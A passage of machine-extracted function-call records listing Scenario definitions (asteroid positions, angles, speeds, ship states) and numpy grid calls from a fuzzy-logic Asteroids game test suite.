"(name='threat_test_4', asteroid_states=[{'position': (400, 600),\n 'angle': 180.0, 'speed': 40}, {'position': (400, 50), 'angle': 0.0,\n 'speed': 0}], ship_state={'position': (400, 150)}, seed=0)\n", (1065, 1264), False, 'from fuzzy_asteroids.util import Scenario\n'), ((1356, 1525), 'fuzzy_asteroids.util.Scenario', 'Scenario', ([], {'name': '"""accuracy_test_1"""', 'asteroid_states': "[{'position': (400, 500), 'angle': 90.0, 'speed': 120, 'size': 1}]", 'ship_state': "{'position': (400, 100)}", 'seed': '(0)'}), "(name='accuracy_test_1', asteroid_states=[{'position': (400, 500),\n 'angle': 90.0, 'speed': 120, 'size': 1}], ship_state={'position': (400,\n 100)}, seed=0)\n", (1364, 1525), False, 'from fuzzy_asteroids.util import Scenario\n'), ((1578, 1748), 'fuzzy_asteroids.util.Scenario', 'Scenario', ([], {'name': '"""accuracy_test_2"""', 'asteroid_states': "[{'position': (400, 500), 'angle': -90.0, 'speed': 120, 'size': 1}]", 'ship_state': "{'position': (400, 100)}", 'seed': '(0)'}), "(name='accuracy_test_2', asteroid_states=[{'position': (400, 500),\n 'angle': -90.0, 'speed': 120, 'size': 1}], ship_state={'position': (400,\n 100)}, seed=0)\n", (1586, 1748), False, 'from fuzzy_asteroids.util import Scenario\n'), ((1801, 1970), 'fuzzy_asteroids.util.Scenario', 'Scenario', ([], {'name': '"""accuracy_test_3"""', 'asteroid_states': "[{'position': (100, 100), 'angle': 0.0, 'speed': 120, 'size': 1}]", 'ship_state': "{'position': (400, 100)}", 'seed': '(0)'}), "(name='accuracy_test_3', asteroid_states=[{'position': (100, 100),\n 'angle': 0.0, 'speed': 120, 'size': 1}], ship_state={'position': (400, \n 100)}, seed=0)\n", (1809, 1970), False, 'from fuzzy_asteroids.util import Scenario\n'), ((2022, 2191), 'fuzzy_asteroids.util.Scenario', 'Scenario', ([], {'name': '"""accuracy_test_4"""', 'asteroid_states': "[{'position': (700, 100), 'angle': 0.0, 'speed': 120, 'size': 1}]", 'ship_state': "{'position': (400, 100)}", 'seed': '(0)'}), "(name='accuracy_test_4', asteroid_states=[{'position': (700, 100),\n 'angle': 0.0, 'speed': 120, 'size': 1}], ship_state={'position': (400, \n 100)}, seed=0)\n", (2030, 2191), False, 'from fuzzy_asteroids.util import Scenario\n'), ((2243, 2413), 'fuzzy_asteroids.util.Scenario', 'Scenario', ([], {'name': '"""accuracy_test_5"""', 'asteroid_states': "[{'position': (100, 500), 'angle': 180.0, 'speed': 120, 'size': 1}]", 'ship_state': "{'position': (400, 100)}", 'seed': '(0)'}), "(name='accuracy_test_5', asteroid_states=[{'position': (100, 500),\n 'angle': 180.0, 'speed': 120, 'size': 1}], ship_state={'position': (400,\n 100)}, seed=0)\n", (2251, 2413), False, 'from fuzzy_asteroids.util import Scenario\n'), ((2466, 2636), 'fuzzy_asteroids.util.Scenario', 'Scenario', ([], {'name': '"""accuracy_test_6"""', 'asteroid_states': "[{'position': (700, 500), 'angle': 180.0, 'speed': 120, 'size': 1}]", 'ship_state': "{'position': (400, 100)}", 'seed': '(0)'}), "(name='accuracy_test_6', asteroid_states=[{'position': (700, 500),\n 'angle': 180.0, 'speed': 120, 'size': 1}], ship_state={'position': (400,\n 100)}, seed=0)\n", (2474, 2636), False, 'from fuzzy_asteroids.util import Scenario\n'), ((2689, 2874), 'fuzzy_asteroids.util.Scenario', 'Scenario', ([], {'name': '"""accuracy_test_7"""', 'asteroid_states': "[{'position': (400, 500), 'angle': 180.0, 'speed': 120, 'size': 1}]", 'ship_state': "{'position': (400, 100), 'angle': 90.0}", 'seed': '(0)'}), "(name='accuracy_test_7', asteroid_states=[{'position': (400, 500),\n 'angle': 180.0, 'speed': 120, 'size': 1}], ship_state={'position': (400,\n 100), 'angle': 90.0}, seed=0)\n", (2697, 2874), False, 'from fuzzy_asteroids.util import Scenario\n'), ((2927, 3113), 'fuzzy_asteroids.util.Scenario', 'Scenario', ([], {'name': '"""accuracy_test_8"""', 'asteroid_states': "[{'position': (400, 500), 'angle': 180.0, 'speed': 120, 'size': 1}]", 'ship_state': "{'position': (400, 100), 'angle': -90.0}", 'seed': '(0)'}), "(name='accuracy_test_8', asteroid_states=[{'position': (400, 500),\n 'angle': 180.0, 'speed': 120, 'size': 1}], ship_state={'position': (400,\n 100), 'angle': -90.0}, seed=0)\n", (2935, 3113), False, 'from fuzzy_asteroids.util import Scenario\n'), ((3166, 3354), 'fuzzy_asteroids.util.Scenario', 'Scenario', ([], {'name': '"""accuracy_test_9"""', 'asteroid_states': "[{'position': (100, 500), 'angle': -135.0, 'speed': 120, 'size': 1}]", 'ship_state': "{'position': (700, 100), 'angle': -90.0}", 'seed': '(0)'}), "(name='accuracy_test_9', asteroid_states=[{'position': (100, 500),\n 'angle': -135.0, 'speed': 120, 'size': 1}], ship_state={'position': (\n 700, 100), 'angle': -90.0}, seed=0)\n", (3174, 3354), False, 'from fuzzy_asteroids.util import Scenario\n'), ((3407, 3593), 'fuzzy_asteroids.util.Scenario', 'Scenario', ([], {'name': '"""accuracy_test_10"""', 'asteroid_states': "[{'position': (700, 500), 'angle': 135.0, 'speed': 120, 'size': 1}]", 'ship_state': "{'position': (100, 100), 'angle': 90.0}", 'seed': '(0)'}), "(name='accuracy_test_10', asteroid_states=[{'position': (700, 500),\n 'angle': 135.0, 'speed': 120, 'size': 1}], ship_state={'position': (100,\n 100), 'angle': 90.0}, seed=0)\n", (3415, 3593), False, 'from fuzzy_asteroids.util import Scenario\n'), ((3724, 4106), 'fuzzy_asteroids.util.Scenario', 'Scenario', ([], {'name': '"""wall_left_easy"""', 'asteroid_states': "[{'position': (0, 100), 'angle': -90.0, 'speed': 60}, {'position': (0, 200),\n 'angle': -90.0, 'speed': 60}, {'position': (0, 300), 'angle': -90.0,\n 'speed': 60}, {'position': (0, 400), 'angle': -90.0, 'speed': 60}, {\n 'position': (0, 500), 'angle': -90.0, 'speed': 60}]", 'ship_state': "{'position': (400, 300)}", 'seed': '(0)'}), "(name='wall_left_easy', asteroid_states=[{'position': (0, 100),\n 'angle': -90.0, 'speed': 60}, {'position': (0, 200), 'angle': -90.0,\n 'speed': 60}, {'position': (0, 300), 'angle': -90.0, 'speed': 60}, {\n 'position': (0, 400), 'angle': -90.0, 'speed': 60}, {'position': (0, \n 500), 'angle': -90.0, 'speed': 60}], ship_state={'position': (400, 300)\n }, seed=0)\n", (3732, 4106), False, 'from fuzzy_asteroids.util import Scenario\n'), ((4307, 4693), 'fuzzy_asteroids.util.Scenario', 'Scenario', ([], {'name': '"""wall_right_easy"""', 'asteroid_states': "[{'position': (800, 100), 'angle': 90.0, 'speed': 60}, {'position': (800, \n 200), 'angle': 90.0, 'speed': 60}, {'position': (800, 300), 'angle': \n 90.0, 'speed': 60}, {'position': (800, 400), 'angle': 90.0, 'speed': 60\n }, {'position': (800, 500), 'angle': 90.0, 'speed': 60}]", 'ship_state': "{'position': (400, 300)}", 'seed': '(0)'}), "(name='wall_right_easy', asteroid_states=[{'position': (800, 100),\n 'angle': 90.0, 'speed': 60}, {'position': (800, 200), 'angle': 90.0,\n 'speed': 60}, {'position': (800, 300), 'angle': 90.0, 'speed': 60}, {\n 'position': (800, 400), 'angle': 90.0, 'speed': 60}, {'position': (800,\n 500), 'angle': 90.0, 'speed': 60}], ship_state={'position': (400, 300)},\n seed=0)\n", (4315, 4693), False, 'from fuzzy_asteroids.util import Scenario\n'), ((4900, 5405), 'fuzzy_asteroids.util.Scenario', 'Scenario', ([], {'name': '"""wall_top_easy"""', 'asteroid_states': "[{'position': (100, 600), 'angle': 180.0, 'speed': 60}, {'position': (200, \n 600), 'angle': 180.0, 'speed': 60}, {'position': (300, 600), 'angle': \n 180.0, 'speed': 60}, {'position': (400, 600), 'angle': 180.0, 'speed': \n 60}, {'position': (500, 600), 'angle': 180.0, 'speed': 60}, {'position':\n (600, 600), 'angle': 180.0, 'speed': 60}, {'position': (700, 600),\n 'angle': 180.0, 'speed': 60}]", 'ship_state': "{'position': (400, 300)}", 'seed': '(0)'}), "(name='wall_top_easy', asteroid_states=[{'position': (100, 600),\n 'angle': 180.0, 'speed': 60}, {'position': (200, 600), 'angle': 180.0,\n 'speed': 60}, {'position': (300, 600), 'angle': 180.0, 'speed': 60}, {\n 'position': (400, 600), 'angle': 180.0, 'speed': 60}, {'position': (500,\n 600), 'angle': 180.0, 'speed': 60}, {'position': (600, 600), 'angle': \n 180.0, 'speed': 60}, {'position': (700, 600), 'angle': 180.0, 'speed': \n 60}], ship_state={'position': (400, 300)}, seed=0)\n", (4908, 5405), False, 'from fuzzy_asteroids.util import Scenario\n'), ((5651, 6129), 'fuzzy_asteroids.util.Scenario', 'Scenario', ([], {'name': '"""wall_bottom_easy"""', 'asteroid_states': "[{'position': (100, 0), 'angle': 0.0, 'speed': 60}, {'position': (200, 0),\n 'angle': 0.0, 'speed': 60}, {'position': (300, 0), 'angle': 0.0,\n 'speed': 60}, {'position': (400, 0), 'angle': 0.0, 'speed': 60}, {\n 'position': (500, 0), 'angle': 0.0, 'speed': 60}, {'position': (600, 0),\n 'angle': 0.0, 'speed': 60}, {'position': (700, 0), 'angle': 0.0,\n 'speed': 60}]", 'ship_state': "{'position': (400, 300)}", 'seed': '(0)'}), "(name='wall_bottom_easy', asteroid_states=[{'position': (100, 0),\n 'angle': 0.0, 'speed': 60}, {'position': (200, 0), 'angle': 0.0,\n 'speed': 60}, {'position': (300, 0), 'angle': 0.0, 'speed': 60}, {\n 'position': (400, 0), 'angle': 0.0, 'speed': 60}, {'position': (500, 0),\n 'angle': 0.0, 'speed': 60}, {'position': (600, 0), 'angle': 0.0,\n 'speed': 60}, {'position': (700, 0), 'angle': 0.0, 'speed': 60}],\n ship_state={'position': (400, 300)}, seed=0)\n", (5659, 6129), False, 'from fuzzy_asteroids.util import Scenario\n'), ((6861, 6968), 'fuzzy_asteroids.util.Scenario', 'Scenario', ([], {'name': '"""ring_closing"""', 'asteroid_states': 'ast_states', 'ship_state': "{'position': (400, 300)}", 'seed': '(0)'}), "(name='ring_closing', asteroid_states=ast_states, ship_state={\n 'position': (400, 300)}, seed=0)\n", (6869, 6968), False, 'from fuzzy_asteroids.util import Scenario\n'), ((7423, 7534), 'fuzzy_asteroids.util.Scenario', 'Scenario', ([], {'name': '"""ring_static_left"""', 'asteroid_states': 'ast_states', 'ship_state': "{'position': (400, 300)}", 'seed': '(0)'}), "(name='ring_static_left', asteroid_states=ast_states, ship_state={\n 'position': (400, 300)}, seed=0)\n", (7431, 7534), False, 'from fuzzy_asteroids.util import Scenario\n'), ((7951, 8063), 'fuzzy_asteroids.util.Scenario', 'Scenario', ([], {'name': '"""ring_static_right"""', 'asteroid_states': 'ast_states', 'ship_state': "{'position': (400, 300)}", 'seed': '(0)'}), "(name='ring_static_right', asteroid_states=ast_states, ship_state={\n 'position': (400, 300)}, seed=0)\n", (7959, 8063), False, 'from fuzzy_asteroids.util import Scenario\n'), ((8500, 8610), 'fuzzy_asteroids.util.Scenario', 'Scenario', ([], {'name': '"""ring_static_top"""', 'asteroid_states': 'ast_states', 'ship_state': "{'position': (400, 300)}", 'seed': '(0)'}), "(name='ring_static_top', asteroid_states=ast_states, ship_state={\n 'position': (400, 300)}, seed=0)\n", (8508, 8610), False, 'from fuzzy_asteroids.util import Scenario\n'), ((9061, 9174), 'fuzzy_asteroids.util.Scenario', 'Scenario', ([], {'name': '"""ring_static_bottom"""', 'asteroid_states': 'ast_states', 'ship_state': "{'position': (400, 300)}", 'seed': '(0)'}), "(name='ring_static_bottom', asteroid_states=ast_states, ship_state=\n {'position': (400, 300)}, seed=0)\n", (9069, 9174), False, 'from fuzzy_asteroids.util import Scenario\n'), ((9563, 9589), 'numpy.linspace', 'np.linspace', (['(0)', '(800)', 'num_x'], {}), '(0, 800, num_x)\n', (9574, 9589), True, 'import numpy as np\n'), ((9703, 9749), 'numpy.meshgrid', 'np.meshgrid', (['x', 'y'], {'sparse': '(False)', 'indexing': '"""ij"""'}), "(x, y, sparse=False, indexing='ij')\n", (9714, 9749), True, 'import numpy as np\n'), ((10110, 10218), 'fuzzy_asteroids.util.Scenario', 'Scenario', ([], {'name': '"""corridor_left"""', 'asteroid_states': 'ast_states', 'ship_state': "{'position': (700, 300)}", 'seed': '(0)'}), "(name='corridor_left', asteroid_states=ast_states, ship_state={\n 'position': (700, 300)}, seed=0)\n", (10118, 10218), False, 'from fuzzy_asteroids.util import Scenario\n'), ((10457, 10566), 'fuzzy_asteroids.util.Scenario', 'Scenario', ([], {'name': '"""corridor_right"""', 'asteroid_states': 'ast_states', 'ship_state': "{'position': (100, 300)}", 'seed': '(0)'}), "(name='corridor_right', asteroid_states=ast_states, ship_state={\n 'position': (100, 300)}, seed=0)\n", (10465, 10566), False, 'from fuzzy_asteroids.util import Scenario\n'), ((10729, 10755), 'numpy.linspace', 'np.linspace', (['(0)', '(600)', 'num_y'], {}), '(0, 600, num_y)\n', (10740, 10755), True, 'import numpy as np\n'), ((10772, 10818), 'numpy.meshgrid', 'np.meshgrid', (['x', 'y'], {'sparse': '(False)', 'indexing': '"""ij"""'}), "(x, y, sparse=False, indexing='ij')\n", (10783, 10818), True, 'import numpy as np\n'), ((11182, 11289), 'fuzzy_asteroids.util.Scenario', 'Scenario', ([], {'name': '"""corridor_top"""', 'asteroid_states': 'ast_states', 'ship_state': "{'position': (400, 100)}", 'seed': '(0)'}), "(name='corridor_top', asteroid_states=ast_states, ship_state={\n 'position': (400, 100)}, seed=0)\n", (11190, 11289), False, 'from fuzzy_asteroids.util import Scenario\n'), ((11550, 11660), 'fuzzy_asteroids.util.Scenario', 'Scenario', ([], {'name': '"""corridor_bottom"""', 'asteroid_states': 'ast_states', 'ship_state': "{'position': (400, 500)}", 'seed': '(0)'}), "(name='corridor_bottom', asteroid_states=ast_states, ship_state={\n 'position': (400, 500)}, seed=0)\n", (11558, 11660), False, 'from fuzzy_asteroids.util import Scenario\n'), ((11998, 12024), 'numpy.linspace', 'np.linspace', (['(0)', '(800)', 'num_x'], {}), '(0, 800, num_x)\n', (12009, 12024), True, 'import numpy as np\n'), ((12138, 12184), 'numpy.meshgrid', 'np.meshgrid', (['x', 'y'], {'sparse': '(False)', 'indexing': '"""ij"""'}), "(x, y, sparse=False, indexing='ij')\n", (12149, 12184), True, 'import numpy as np\n'), ((12377, 12502), 'fuzzy_asteroids.util.Scenario', 'Scenario', ([], {'name': '"""moving_corridor_1"""', 'asteroid_states': 'ast_states', 'ship_state': "{'position': (400, 300), 'angle': 90}", 'seed': '(0)'}), "(name='moving_corridor_1', asteroid_states=ast_states, ship_state={\n 'position': (400, 300), 'angle': 90}, seed=0)\n", (12385, 12502), False, 'from fuzzy_asteroids.util import Scenario\n'), ((12596, 12622), 'numpy.linspace', 'np.linspace', (['(0)', '(800)', 'num_x'], {}), '(0, 800, num_x)\n', (12607, 12622), True, 'import numpy as np\n'), ((12736, 12782), 'numpy.meshgrid', 'np.meshgrid', (['x', 'y'], {'sparse': '(False)', 'indexing': '"""ij"""'}), "(x, y, sparse=False, indexing='ij')\n", (12747, 12782), True, 'import numpy as np\n'), ((12974, 13100), 'fuzzy_asteroids.util.Scenario', 'Scenario', ([], {'name': '"""moving_corridor_2"""', 'asteroid_states': 'ast_states', 'ship_state': "{'position': (400, 300), 'angle': -90}", 'seed': '(0)'}), "(name='moving_corridor_2', asteroid_states=ast_states, ship_state={\n 'position': (400, 300), 'angle': -90}, seed=0)\n", (12982, 13100), False, 'from fuzzy_asteroids.util import Scenario\n'), ((13292, 13318), 'numpy.linspace', 'np.linspace', (['(0)', '(600)', 'num_y'], {}), '(0, 600, num_y)\n', (13303, 13318), True, 'import numpy as np\n'), ((13335, 13381), 'numpy.meshgrid', 'np.meshgrid', (['x', 'y'], {'sparse': '(False)', 'indexing': '"""ij"""'}), "(x, y, sparse=False, indexing='ij')\n", (13346, 13381), True, 'import numpy as np\n'), ((13574, 13698), 'fuzzy_asteroids.util.Scenario', 'Scenario', ([], {'name': '"""moving_corridor_3"""', 'asteroid_states': 'ast_states', 'ship_state': "{'position': (400, 300), 'angle': 0}", 'seed': '(0)'}), "(name='moving_corridor_3', asteroid_states=ast_states, ship_state={\n 'position': (400, 300), 'angle': 0}, seed=0)\n", (13582, 13698), False, 'from fuzzy_asteroids.util import Scenario\n'), ((13888, 13914), 'numpy.linspace', 'np.linspace', (['(0)', '(600)', 'num_y'], {}), '(0, 600, num_y)\n', (13899, 13914), True, 'import numpy as np\n'), ((13931, 13977), 'numpy.meshgrid', 'np.meshgrid', (['x', 'y'], {'sparse': '(False)', 'indexing': '"""ij"""'}), "(x, y, sparse=False, indexing='ij')\n", (13942, 13977), True, 'import numpy as np\n'), ((14168, 14294), 'fuzzy_asteroids.util.Scenario', 'Scenario', ([], {'name': '"""moving_corridor_4"""', 'asteroid_states': 'ast_states', 'ship_state': "{'position': (400, 300), 'angle': 180}", 'seed': '(0)'}), "(name='moving_corridor_4', asteroid_states=ast_states, ship_state={\n 'position': (400, 300), 'angle': 180}, seed=0)\n", (14176, 14294), False, 'from fuzzy_asteroids.util import Scenario\n'), ((14394, 14420), 'numpy.linspace', 'np.linspace', (['(0)', '(800)', 'num_x'], {}), '(0, 800, num_x)\n', (14405, 14420), True, 'import numpy as np\n'), ((14425, 14451), 'numpy.linspace', 'np.linspace', (['(0)', '(600)', 'num_y'], {}), '(0, 600, num_y)\n', (14436, 14451), True, 'import numpy as np\n'), ((14468, 14514), 'numpy.meshgrid', 'np.meshgrid', (['x', 'y'], {'sparse': '(False)', 'indexing': '"""ij"""'}), "(x, y, sparse=False, indexing='ij')\n", (14479, 14514), True, 'import numpy as np\n'), ((14866, 14996), 'fuzzy_asteroids.util.Scenario', 'Scenario', ([], {'name': '"""moving_corridor_angled_1"""', 'asteroid_states': 'ast_states', 'ship_state': "{'position': (750, 50), 'angle': 90}", 'seed': '(0)'}), "(name='moving_corridor_angled_1', asteroid_states=ast_states,\n ship_state={'position': (750, 50), 'angle': 90}, seed=0)\n", (14874, 14996), False, 'from fuzzy_asteroids.util import Scenario\n'), ((15097, 15123), 'numpy.linspace', 'np.linspace', (['(0)', '(800)', 'num_x'], {}), '(0, 800, num_x)\n', (15108, 15123), True, 'import numpy as np\n'), ((15128, 15154), 'numpy.linspace', 'np.linspace', (['(0)', '(600)', 'num_y'], {}), '(0, 600, num_y)\n', (15139, 15154), True, 'import numpy as np\n'), ((15171, 15217), 'numpy.meshgrid', 'np.meshgrid', (['x', 'y'], {'sparse': '(False)', 'indexing': '"""ij"""'}), "(x, y, sparse=False, indexing='ij')\n", (15182, 15217), True, 'import numpy as np\n'), ((15574, 15705), 'fuzzy_asteroids.util.Scenario', 'Scenario', ([], {'name': '"""moving_corridor_angled_2"""', 'asteroid_states': 'ast_states', 'ship_state': "{'position': (750, 550), 'angle': 90}", 'seed': '(0)'}), "(name='moving_corridor_angled_2', asteroid_states=ast_states,\n ship_state={'position': (750, 550), 'angle': 90}, seed=0)\n", (15582, 15705), False, 'from fuzzy_asteroids.util import Scenario\n'), ((15806, 15832), 'numpy.linspace', 'np.linspace', (['(0)', '(800)', 'num_x'], {}), '(0, 800, num_x)\n', (15817, 15832), True, 'import numpy as np\n'), ((15837, 15863), 'numpy.linspace', 'np.linspace', (['(0)', '(600)', 'num_y'], {}), '(0, 600, num_y)\n', (15848, 15863), True, 'import numpy as np\n'), ((15880, 15926), 'numpy.meshgrid', 'np.meshgrid', (['x', 'y'], {'sparse': '(False)', 'indexing': '"""ij"""'}), "(x, y, sparse=False, indexing='ij')\n", (15891, 15926), True, 'import numpy as np\n'), ((16220, 16350), 'fuzzy_asteroids.util.Scenario', 'Scenario', ([], {'name': '"""moving_corridor_curve_1"""', 'asteroid_states': 'ast_states', 'ship_state': "{'position': (550, 500), 'angle': 90}", 'seed': '(0)'}), "(name='moving_corridor_curve_1', asteroid_states=ast_states,\n ship_state={'position': (550, 500), 'angle': 90}, seed=0)\n", (16228, 16350), False, 'from fuzzy_asteroids.util import Scenario\n'), ((16451, 16477), 'numpy.linspace', 'np.linspace', (['(0)', '(800)', 'num_x'], {}), '(0, 800, num_x)\n', (16462, 16477), True, 'import numpy as np\n'), ((16482, 16508), 'numpy.linspace', 'np.linspace', (['(0)', '(600)', 'num_y'], {}), '(0, 600, num_y)\n', (16493, 16508), True, 'import numpy as np\n'), ((16525, 16571), 'numpy.meshgrid', 'np.meshgrid', (['x', 'y'], {'sparse': '(False)', 'indexing': '"""ij"""'}), "(x, y, sparse=False, indexing='ij')\n", (16536, 16571), True, 'import numpy as np\n'), ((16964, 17094), 'fuzzy_asteroids.util.Scenario', 'Scenario', ([], {'name': '"""moving_corridor_curve_2"""', 'asteroid_states': 'ast_states', 'ship_state': "{'position': (550, 100), 'angle': 90}", 'seed': '(0)'}), "(name='moving_corridor_curve_2', asteroid_states=ast_states,\n ship_state={'position': (550, 100), 'angle': 90}, seed=0)\n", (16972, 17094), False, 'from fuzzy_asteroids.util import Scenario\n'), ((17545, 17600), 'fuzzy_asteroids.util.Scenario', 'Scenario', ([], {'name': '"""apocalypse_1"""', 'num_asteroids': '(50)', 'seed': '(1)'}), "(name='apocalypse_1', num_asteroids=50, seed=1)\n", (17553, 17600), False, 'from fuzzy_asteroids.util import Scenario\n'), ((17888, 18395), 'fuzzy_asteroids.util.Scenario', 'Scenario', ([], {'name': '"""wall_right_wrap_1"""', 'asteroid_states': "[{'position': (600, 0), 'angle': -90.0, 'speed': 80}, {'position': (600, \n 100), 'angle': -90.0, 'speed': 80}, {'position': (600, 200), 'angle': -\n 90.0, 'speed': 80}, {'position': (600, 300), 'angle': -90.0, 'speed': \n 80}, {'position': (600, 400), 'angle': -90.0, 'speed': 80}, {'position':\n (600, 500), 'angle': -90.0, 'speed': 80}, {'position': (600, 600),\n 'angle': -90.0, 'speed': 80}]", 'ship_state': "{'position': (750, 300)}", 'seed': '(0)'}), "(name='wall_right_wrap_1', asteroid_states=[{'position': (600, 0),\n 'angle': -90.0, 'speed': 80}, {'position': (600, 100), 'angle': -90.0,\n 'speed': 80}, {'position': (600, 200), 'angle': -90.0, 'speed': 80}, {\n 'position': (600, 300), 'angle': -90.0, 'speed': 80}, {'position': (600,\n 400), 'angle': -90.0, 'speed': 80}, {'position': (600, 500), 'angle': -\n 90.0, 'speed': 80}, {'position': (600, 600), 'angle': -90.0, 'speed': \n 80}], ship_state={'position': (750, 300)}, seed=0)\n", (17896, 18395), False, 'from fuzzy_asteroids.util import Scenario\n'), ((18557, 19063), 'fuzzy_asteroids.util.Scenario', 'Scenario', ([], {'name': '"""wall_right_wrap_2"""', 'asteroid_states': "[{'position': (750, 0), 'angle': -90.0, 'speed': 80}, {'position': (750, \n 100), 'angle': -90.0, 'speed': 80}, {'position': (750, 200), 'angle': -\n 90.0, 'speed': 80}, {'position': (750, 300), 'angle': -90.0, 'speed': \n 80}, {'position': (750, 400), 'angle': -90.0, 'speed': 80}, {'position':\n (750, 500), 'angle': -90.0, 'speed': 80}, {'position': (750, 600),\n 'angle': -90.0, 'speed': 80}]", 'ship_state': "{'position': (50, 300)}", 'seed': '(0)'}), "(name='wall_right_wrap_2', asteroid_states=[{'position': (750, 0),\n 'angle': -90.0, 'speed': 80}, {'position': (750, 100), 'angle': -90.0,\n 'speed': 80}, {'position': (750, 200), 'angle': -90.0, 'speed': 80}, {\n 'position': (750, 300), 'angle': -90.0, 'speed': 80}, {'position': (750,\n 400), 'angle': -90.0, 'speed': 80}, {'position': (750, 500), 'angle': -\n 90.0, 'speed': 80}, {'position': (750, 600), 'angle': -90.0, 'speed': \n 80}], ship_state={'position': (50, 300)}, seed=0)\n", (18565, 19063), False, 'from fuzzy_asteroids.util import Scenario\n'), ((19225, 20134), 'fuzzy_asteroids.util.Scenario', 'Scenario', ([], {'name': '"""wall_right_wrap_3"""', 'asteroid_states': "[{'position': (600, 0), 'angle': -90.0, 'speed': 80}, {'position': (600, \n 100), 'angle': -90.0, 'speed': 80}, {'position': (600, 200), 'angle': -\n 90.0, 'speed': 80}, {'position': (600, 300), 'angle': -90.0, 'speed': \n 80}, {'position': (600, 400), 'angle': -90.0, 'speed': 80}, {'position':\n (600, 500), 'angle': -90.0, 'speed': 80}, {'position': (600, 600),\n 'angle': -90.0, 'speed': 80}, {'position': (200, 0), 'angle': -90.0,\n 'speed': 0}, {'position': (200, 100), 'angle': -90.0, 'speed': 0}, {\n 'position': (200, 200), 'angle': -90.0, 'speed': 0}, {'position': (200,\n 300), 'angle': -90.0, 'speed': 0}, {'position': (200, 400), 'angle': -\n 90.0, 'speed': 0}, {'position': (200, 500), 'angle': -90.0, 'speed': 0},\n {'position': (200, 600), 'angle': -90.0, 'speed': 0}]", 'ship_state': "{'position': (750, 300)}", 'seed': '(0)'}), "(name='wall_right_wrap_3', asteroid_states=[{'position': (600, 0),\n 'angle': -90.0, 'speed': 80}, {'position': (600, 100), 'angle': -90.0,\n 'speed': 80}, {'position': (600, 200), 'angle': -90.0, 'speed': 80}, {\n 'position': (600, 300), 'angle': -90.0, 'speed': 80}, {'position': (600,\n 400), 'angle': -90.0, 'speed': 80}, {'position': (600, 500), 'angle': -\n 90.0, 'speed': 80}, {'position': (600, 600), 'angle': -90.0, 'speed': \n 80}, {'position': (200, 0), 'angle': -90.0, 'speed': 0}, {'position': (\n 200, 100), 'angle': -90.0, 'speed': 0}, {'position': (200, 200),\n 'angle': -90.0, 'speed': 0}, {'position': (200, 300), 'angle': -90.0,\n 'speed': 0}, {'position': (200, 400), 'angle': -90.0, 'speed': 0}, {\n 'position': (200, 500), 'angle': -90.0, 'speed': 0}, {'position': (200,\n 600), 'angle': -90.0, 'speed': 0}], ship_state={'position': (750, 300)},\n seed=0)\n", (19233, 20134), False, 'from fuzzy_asteroids.util import Scenario\n'), ((20417, 21325), 'fuzzy_asteroids.util.Scenario', 'Scenario', ([], {'name': '"""wall_right_wrap_4"""', 'asteroid_states': "[{'position': (750, 0), 'angle': -90.0, 'speed': 80}, {'position': (750, \n 100), 'angle': -90.0, 'speed': 80}, {'position': (750, 200), 'angle': -\n 90.0, 'speed': 80}, {'position': (750, 300), 'angle': -90.0, 'speed': \n 80}, {'position': (750, 400), 'angle': -90.0, 'speed': 80}, {'position':\n (750, 500), 'angle': -90.0, 'speed': 80}, {'position': (750, 600),\n 'angle': -90.0, 'speed': 80}, {'position': (200, 0), 'angle': -90.0,\n 'speed': 0}, {'position': (200, 100), 'angle': -90.0, 'speed': 0}, {\n 'position': (200, 200), 'angle': -90.0, 'speed': 0}, {'position': (200,\n 300), 'angle': -90.0, 'speed': 0}, {'position': (200, 400), 'angle': -\n 90.0, 'speed': 0}, {'position': (200, 500), 'angle': -90.0, 'speed': 0},\n {'position': (200, 600), 'angle': -90.0, 'speed': 0}]", 'ship_state': "{'position': (50, 300)}", 'seed': '(0)'}), "(name='wall_right_wrap_4', asteroid_states=[{'position': (750, 0),\n 'angle': -90.0, 'speed': 80}, {'position': (750, 100), 'angle': -90.0,\n 'speed': 80}, {'position': (750, 200), 'angle': -90.0, 'speed': 80}, {\n 'position': (750, 300), 'angle': -90.0, 'speed': 80}, {'position': (750,\n 400), 'angle': -90.0, 'speed': 80}, {'position': (750, 500), 'angle': -\n 90.0, 'speed': 80}, {'position': (750, 600), 'angle': -90.0, 'speed': \n 80}, {'position': (200, 0), 'angle': -90.0, 'speed': 0}, {'position': (\n 200, 100), 'angle': -90.0, 'speed': 0}, {'position': (200, 200),\n 'angle': -90.0, 'speed': 0}, {'position': (200, 300), 'angle': -90.0,\n 'speed': 0}, {'position': (200, 400), 'angle': -90.0, 'speed': 0}, {\n 'position': (200, 500), 'angle': -90.0, 'speed': 0}, {'position': (200,\n 600), 'angle': -90.0, 'speed': 0}], ship_state={'position': (50, 300)},\n seed=0)\n", (20425, 21325), False, 'from fuzzy_asteroids.util import Scenario\n'), ((21629, 22127), 'fuzzy_asteroids.util.Scenario', 'Scenario', ([], {'name': '"""wall_left_wrap_1"""', 'asteroid_states': "[{'position': (200, 0), 'angle': 90.0, 'speed': 80}, {'position': (200, 100\n ), 'angle': 90.0, 'speed': 80}, {'position': (200, 200), 'angle': 90.0,\n 'speed': 80}, {'position': (200, 300), 'angle': 90.0, 'speed': 80}, {\n 'position': (200, 400), 'angle': 90.0, 'speed': 80}, {'position': (200,\n 500), 'angle': 90.0, 'speed': 80}, {'position': (200, 600), 'angle': \n 90.0, 'speed': 80}]", 'ship_state': "{'position': (50, 300)}", 'seed': '(0)'}), "(name='wall_left_wrap_1', asteroid_states=[{'position': (200, 0),\n 'angle': 90.0, 'speed': 80}, {'position': (200, 100), 'angle': 90.0,\n 'speed': 80}, {'position': (200, 200), 'angle': 90.0, 'speed': 80}, {\n 'position': (200, 300), 'angle': 90.0, 'speed': 80}, {'position': (200,\n 400), 'angle': 90.0, 'speed': 80}, {'position': (200, 500), 'angle': \n 90.0, 'speed': 80}, {'position': (200, 600), 'angle': 90.0, 'speed': 80\n }], ship_state={'position': (50, 300)}, seed=0)\n", (21637, 22127), False, 'from fuzzy_asteroids.util import Scenario\n'), ((22288, 22781), 'fuzzy_asteroids.util.Scenario', 'Scenario', ([], {'name': '"""wall_left_wrap_2"""', 'asteroid_states': "[{'position': (50, 0), 'angle': 90.0, 'speed': 80}, {'position': (50, 100),\n 'angle': 90.0, 'speed': 80}, {'position': (50, 200), 'angle': 90.0,\n 'speed': 80}, {'position': (50, 300), 'angle': 90.0, 'speed': 80}, {\n 'position': (50, 400), 'angle': 90.0, 'speed': 80}, {'position': (50, \n 500), 'angle': 90.0, 'speed': 80}, {'position': (50, 600), 'angle': \n 90.0, 'speed': 80}]", 'ship_state': "{'position': (750, 300)}", 'seed': '(0)'}), 